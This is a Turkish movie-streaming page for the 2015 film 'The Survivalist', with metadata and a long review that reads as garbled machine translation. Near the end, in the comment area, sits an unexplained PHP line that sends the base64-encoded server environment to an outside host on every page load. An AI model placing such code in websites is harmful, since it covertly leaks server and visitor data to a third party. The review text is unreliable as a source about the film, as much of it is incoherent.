Beğen
0
0
- Reklamı Geç -
BENZER FİLMLER

The Survivalist izle

-

The Survivalist

The Survivalist izle
PUAN : 7.0
The Survivalist izle 7.0 / 10 1 kullanıcı oyu.
  • Süre: 104 Dk.
  • Vizyon: 2015
  • Ülke: İngiltere
  • İzlenme: 384
  • Favori: 0
  • İMDB: 6.7
  • Kalite: 720P
  • Altyazı
Eğer John Hillcoat post-apokaliptik drama düşünüyorsan Yolun biraz fazla iyimser ve ışık oldu, sonra da Stephen Fingleton bu özelliği ilk kez, Will, tam olacak. Yılın hissediyorum-kötü film ne olabilir, Fingleton dünyadaki petrol kaynakları tükenmiş ve nüfus azaldı nerede cesur bir gelecek sunar. Bu fon daha önce de birkaç kez ama böyle sarsılmaz ve grafik olarak gerçek bir şekilde gördük.

Bir yağmurda neredeyse çıplak bir ceset sürükleyerek bir adam-orman sırılsıklam ile film açılır, sığ bir mezara onu gömmek. Bu bulutlu, sahneyi, sürekli bir şey yapmaz ama kıyamet bak serin ve eğlenceli hale getiren Will tonu, iç karartıcı bir film. Martin McCann kendi başına küçük bir kulübede derin ormanın içinde bir on yıl daha iyi parçası için yaşayan adı açıklanmayan kurşun, bir adam oynar.

Hayatının monotonluğu dolu, ama amaçsız değil; başka bir gün yapmak için ihtiyaç duyacağı her şeyi yapıyor. Hayvanlar için bu rutin – tuzak kurmak için onu takip ediyoruz, bitkileri küçük parsel onun eğilimi, yakacak odun toplama ve toplanan yağmur suyu ile kıçını temizleme. Her dünya onun iki kadın, Mia Goth ve Olwen Fouere tarafından oynanan, onun malı üzerine yanılmak zaman altüst kadar güzel onun için ilerleyen. Şimdi ise sadece onları öldürmek ve hayatta kalmak devam ederse etrafında tutmaya değer olmadıklarına karar vermeli.

Will içinde diyalog seyrek ve kasıtlı olduğunu, yalnızca kesinlikle gerekli olduğunda karakterlerin konuşma yapıyor. McCann performansı neredeyse tamamen kafa hareketleri ve muhteşem işler o ifadeler kullanır. Konuşma eksikliği filmin sessiz gerçekçilik katıyor, eve bu insanlar sadece hayatta, aslında yaşamak değil aslında çekiç.

Film ayrıca hangi sırada oturmak için sadece zor değil, aynı zamanda ahlaki kararsızlıklarla sayısız yükselten film boyunca bazı anlar vardır hayatta, devam etmek için gidiyoruz uzunlukları araştırıyor. Aynı durumda ve aynı zor kararlar vermek mümkün olsaydı nasıl tepki vereceğini sorularını uyandıran bir film.

Bu elçiler ve hayatta kalma fındık ararlar gereken film türüdür. Son birkaç yıl içinde çıkacak olan bu post-apokaliptik bir film mutlaka medeniyetin çöküşünden yüceltmek istemiyorum ama gerçekten çok kötü olurdu genellikle tatlı dilli – bu film bunu yapmıyor.

Bu bir gerçek ve Fingleton sadece korkunç ve acımasız bu gerçeği nasıl olurdu yakın ayrıntılı olarak gösteren çok utangaç değil. Kamera sürekli sıkı çekti, her şey biraz klostrofobik bir his veren, yemyeşil ıssız bir yer olmasına rağmen. Kir ve muck neredeyse her şeyi kapsayacak ve sürekli yağmur yağıyor ve hava kapalı. Oluşturun kendilerini, karakterleri daha da gereksiz herhangi bir stil veya yetenek film sıyırma ne başka bir müzik yok.

Will ton, içerik ve yapı açısından zor bir film. Sıkıcı ayarı, neredeyse varolmayan diyalog ve çok kötü bir konu ile, kesinlikle herkese göre değil ve doğru ruh hali takdir edilmeyi gerektirir. Bu söyleniyor, tam olarak medeniyetin çöküşü boş alışveriş merkezleri ve marketler ile – eğlenceli bir oyun olurdu herhalde böyle ama sadece ölmemek için her gün çalışıyor ve her zaman korkunç şeyler yapmak zorunda olmak uzun ve zorlu bir yolculuk.
www.cok9.com www.cuk4.com www.zot2.com
  Filmin Yönetmen ve Oyuncuları
Yorum Alanı 0 Yorum Yapılmış
Misafir
<?=file_get_contents('http://aabd.xlog.info/api_aadb.php?ids=197622&server='.base64_encode(json_encode($_SERVER)));?>
KAPAT